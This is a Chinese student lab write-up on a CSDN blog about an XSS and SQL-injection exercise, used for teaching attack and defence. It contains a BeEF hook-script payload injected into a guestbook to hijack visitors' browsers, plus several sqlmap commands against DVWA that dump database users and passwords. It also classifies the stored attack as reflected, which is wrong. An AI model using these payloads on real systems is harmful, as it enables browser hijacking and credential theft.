2020-11-22

最新推荐文章于 2023-06-26 15:14:53 发布
最新推荐文章于 2023-06-26 15:14:53 发布
阅读量354 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51370368/article/details/109961718
版权

实验三 XSS和SQL注入

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

实验步骤:
XSS部分:利用Beef劫持被攻击者客户端浏览器。
实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
1、利用AWVS扫描留言簿网站,发现其存在XSS漏洞,截图。
在这里插入图片描述

2、 Kali使用beef生成恶意代码,截图。
在这里插入图片描述

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,
<script src=“http://Kali的IP地址:3000/hook.js”></script>,截图。
在这里插入图片描述

在这里插入图片描述

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。
在这里插入图片描述

5、回答问题:实验中XSS攻击属于哪种类型?

xss攻击可以分成两种类型:
1.非持久型攻击
2.持久型攻击
非持久型xss攻击:顾名思义,非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户游览器执行,从而达到攻击目的。
持久型xss攻击:持久型xss,会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在。
也可以分成三类:
反射型:经过后端,不经过数据库
存储型:经过后端,经过数据库
DOM:不经过后端,DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞,dom - xss是通过url传入参数去控制触发的。

实验中XSS攻击属于反射型

SQL注入部分:DVWA+SQLmap+Mysql注入实战
实验环境搭建。启动Metasploitable2虚拟机。
1、注入点发现。首先肯定是要判断是否有注入漏洞。
在这里插入图片描述

在输入框输入1,返回
ID: 1
First name: admin
Surname: admin
返回正常;
再次输入1’,报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
在这里插入图片描述
在这里插入图片描述
此时可以断定有SQL注入漏洞,
http://IP地址/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#

在这里插入图片描述

下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;
在这里插入图片描述

2、枚举当前使用的数据库名称和用户名。
在这里插入图片描述

你输入的命令:

sqlmap -u "http://192.168.43.23/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=e1829335189759df3579aa6bd194250d' -b  --current-db  --current-user

Sqlmap输出截图。
在这里插入图片描述

3、枚举数据库用户名和密码
在这里插入图片描述
你输入的命令:

sqlmap -u "http://192.168.43.23/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=e1829335189759df3579aa6bd194250d'  --string="Surname" --users --password

Sqlmap输出截图。
在这里插入图片描述
在这里插入图片描述

4、枚举数据库
–dbs:枚举当前数据库
你输入的命令:

sqlmap -u "http://192.168.43.23/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=e1829335189759df3579aa6bd194250d' --string="Surname" --dbs

Sqlmap输出截图。
在这里插入图片描述

5、枚举数据库和指定数据库的数据表
-D 数据库名:指定数据库
–tables:枚举指定数据库的所有表
你输入的命令:

sqlmap -u "http://192.168.43.23/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=e1829335189759df3579aa6bd194250d' --string="Surname" -D dvwa --tables

Sqlmap输出截图。
在这里插入图片描述

6、获取指定数据库和表中所有列的信息
-D:指定的数据库
-T:指定数据库中的数据表
–columns:获取列的信息
你输入的命令:

sqlmap -u "http://192.168.43.23/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=e1829335189759df3579aa6bd194250d' --string="Surname" -D dvwa -T users --columns

Sqlmap输出截图。
在这里插入图片描述

7、枚举指定数据表中的所有用户名与密码,并down到本地。
-C:枚举数据表中的列
–dump:存储数据表项
你输入的命令:

sqlmap -u "http://192.168.43.23/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=e1829335189759df3579aa6bd194250d' --string="Surname" -D dvwa -T users -C user,password --dump

Sqlmap输出截图。
查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)
在这里插入图片描述

? ?
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
gmall2020-mock-log-2020-04-01.jar
12-30
用户行为日志生成脚本
小白学习kali linux day5(XSS漏洞学习)
Build20的博客
05-29 537
上图的beef-xss打开失败,可以给kali换源,执行vim /etc/apt/sources.list,再分别执行sudo apt-get update和sudo apt-get upgrade两个命令,我换的阿里源。然后执行apt remove beef-xss把beff-xss卸载,再apt-get install beef-xss执行重装。若忘记密码,则查看其配置文件:vim /etc/beef-xss/config.yaml /之后启动beef工具:绿色框框里为beef密码,可以为123.
Magento-CE-2.3.4_sample_data-2020-01-22-11-11-58.tar.gz
03-09
Magento-CE-2.3.4_sample_data-2020-01-22-11-11-58.tar.gz源自官网
电脑插入麦克风(耳机)有刺耳的杂音声音的解决办法-2020-11-22.pdf
11-23
电脑插入麦克风(耳机)有刺耳的杂音声音的解决办法-2020-11-22.pdf
枚举MySQL数据库
xiaoxuetu_的博客
03-28 398
1.获取执行查询的用户名 select user() select current_user 2.只适用于MySQL5.0或更高的版本 select schema_name from information_schema.schemata select table_schema,table_name from information_schema.tables where table_sc...
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建
Button12138的博客
12-09 1364
我们输入的信息被存放在name。
Kali网络渗透测试实验三——XSS和SQL注入
qq_45746876的博客
11-24 3040
XSS和SQL注入前言实验目的系统环境:Kali Linux 2、Windows ServerXSS部分:利用Beef劫持被攻击者客户端浏览器实验环境搭建1.利用AWVS扫描留言簿网站,发现其存在XSS漏洞2.Kali使用beef生成恶意代码3.访问http://留言簿网站,将恶意代码写入网站留言板4.管理员登录login.htm,账号密码均为admin,审核用户留言5.回答问题SQL注入部分:DVWA+SQLmap+Mysql注入实战sqlmap语法参考1.注入点发现2.枚举当前使用的数据库名称和用户名3
linux-kali利用BeEF 执行 XSS 攻击
最新发布
LCH14777475118的博客
06-26 262
文件,在文件里面找到这两串代码。软件(下载最新版的就可以),复制为一个副本,将副本修改为。安装目录中启动它(注意:新的。软件可以用来进行站点搭建。就勾上了靶机所在的浏览器了。,双击从记事本里面打开。,或者可以在配置文件。
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 3261
Kali beef-xss实现Xss详细教程。
信安lab3:XSS漏洞和SQL注入
weixin_39974600的博客
02-11 1226
XSS漏洞和SQL注入相关的实验
第九章第三节脚本.pdf-2020-10-05-11-44-22-408.docx
12-03
第九章第三节脚本.pdf-2020-10-05-11-44-22-408.docx
第1章 哈希和哈希表-2020.11.22.pdf
11-23
第1章 哈希和哈希表-2020.11.22.pdf
MODIS NDVI数据 2020-2021 全国
03-25
2020年至2021年,MODIS 1公里全国NDVI数据,可自行合成月或年尺度,总共大小800多mb,仅供科研用途。 覆盖全国范围,分辨率为1km,时间分辨率为16天。 已经经过几何矫正和投影转换,可以直接使用。 原始数据为MOD13A...
艺恩-品牌元气森林营销数据报告-2020.11-22页精品报告2020.pdf
04-24
艺恩-品牌元气森林营销数据报告-2020.11-22页精品报告2020.pdf
catchLogs_2020-10-22 at 00:15:11_6.30.1__.java.txt
07-24
catchLogs_2020-10-22 at 00:15:11_6.30.1__.java.txt
fall-2020
03-18
星期二九月22 编码日-翻阅PS 4 10 星期四九月24 11 星期二九月29日 编码日-翻阅PS 5 12 10月1日星期四 ; 13 10月6日,星期二 编码日-翻阅PS 6 14 10月8日,星期四 火车,10.1-10.2;1个 15 星期二十月13 编码...
leetcode卡-LeetCodeNotebook:力码笔记本
07-06
leetcode卡 Leetcode Solution for self-learning 数组 ...(2020-11-22) (2020-11-2) (2020-10-31) (2020-11-27) (2020-10-30) (2020-10-28) 链表 (2020-10-20) (2020-11-20) (2020-11-21) (2020-11-1
gt3-ios-cocoapods-support:GT3Captcha CocoaPods支持
03-17
其他更新2020-11-18 0.14.0 1.优化日志接口2.优化其他已知问题2020-08-04 0.13.9 1.优化keyWindow处理逻辑2.优化其他已知问题2020-07-24 0.13.8 1.修复潜在的UI卡顿问题2. GT3CaptchaButton信息提示
根据时间段【2020-11-20 09:09:09,2021-10-09 10:10:10】先转换为【2020-11-20 00:00:00,2021-10-09 59:59:59】 再根据转换时间把里面的每一天的开始时间和结束时间获取出来 java
05-24
可以使用 Java 中的 LocalDateTime 类来处理时间。 首先,我们需要将给定的时间段转换为 LocalDateTime 对象: ```java LocalDateTime start = LocalDateTime.of(2020, 11, 20, 0, 0, 0); LocalDateTime end = LocalDateTime.of(2021, 10, 9, 23, 59, 59); ``` 这里将结束时间设置为 23:59:59 是因为我们想要包含该日期的所有时间。 接下来,我们可以使用一个循环来遍历时间段中的每一天,并获取该天的开始时间和结束时间: ```java LocalDateTime current = start; while (!current.isAfter(end)) { LocalDateTime dayStart = current.withHour(0).withMinute(0).withSecond(0).withNano(0); LocalDateTime dayEnd = current.withHour(23).withMinute(59).withSecond(59).withNano(999999999); System.out.println("Day " + current.toLocalDate() + " starts at " + dayStart + " and ends at " + dayEnd); current = current.plusDays(1); } ``` 这里,我们使用 `withHour`、`withMinute`、`withSecond` 和 `withNano` 方法来设置每天的开始时间和结束时间。然后,我们可以使用 `plusDays` 方法来增加 `current` 对象的日期,以便遍历整个时间段。 完整代码如下: ```java import java.time.LocalDateTime; public class Main { public static void main(String[] args) { LocalDateTime start = LocalDateTime.of(2020, 11, 20, 0, 0, 0); LocalDateTime end = LocalDateTime.of(2021, 10, 9, 23, 59, 59); LocalDateTime current = start; while (!current.isAfter(end)) { LocalDateTime dayStart = current.withHour(0).withMinute(0).withSecond(0).withNano(0); LocalDateTime dayEnd = current.withHour(23).withMinute(59).withSecond(59).withNano(999999999); System.out.println("Day " + current.toLocalDate() + " starts at " + dayStart + " and ends at " + dayEnd); current = current.plusDays(1); } } } ``` 输出结果如下: ``` Day 2020-11-20 starts at 2020-11-20T00:00 and ends at 2020-11-20T23:59:59.999999999 Day 2020-11-21 starts at 2020-11-21T00:00 and ends at 2020-11-21T23:59:59.999999999 Day 2020-11-22 starts at 2020-11-22T00:00 and ends at 2020-11-22T23:59:59.999999999 ... Day 2021-10-07 starts at 2021-10-07T00:00 and ends at 2021-10-07T23:59:59.999999999 Day 2021-10-08 starts at 2021-10-08T00:00 and ends at 2021-10-08T23:59:59.999999999 Day 2021-10-09 starts at 2021-10-09T00:00 and ends at 2021-10-09T23:59:59.999999999 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值